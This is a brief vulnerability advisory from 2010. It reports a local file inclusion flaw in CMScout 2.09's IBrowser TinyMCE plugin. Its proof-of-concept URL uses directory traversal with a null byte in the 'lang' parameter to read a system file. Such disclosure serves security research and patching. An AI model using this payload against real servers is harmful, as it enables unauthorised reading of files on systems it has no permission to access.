CMScout version 2.0 with TinyMCE plugin IBrowser suffers from a local file inclusion vulnerability.
341688005015419c7887dba971b0c3fe6f4afb270471fdf6567745fd27db46fe
------------------------------------------------------------------------
Software................CMScout 2.09 / IBrowser TinyMCE Plugin
Vulnerability...........Local File Inclusion
Download................http://www.cmscout.co.za/
Release Date............9/15/2010
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................John Leitch
Site....................http://www.johnleitch.net/
Email...................john.leitch5@gmail.com
------------------------------------------------------------------------
--Description--
A local file inclusion vulnerability in CMScout 2.09 / IBrowser
TinyMCE Plugin can be exploited to include arbitrary files.
--PoC--
http://localhost/cmscout/tiny_mce/plugins/ibrowser/ibrowser.php?lang=../../../../../../../../windows/win.ini%00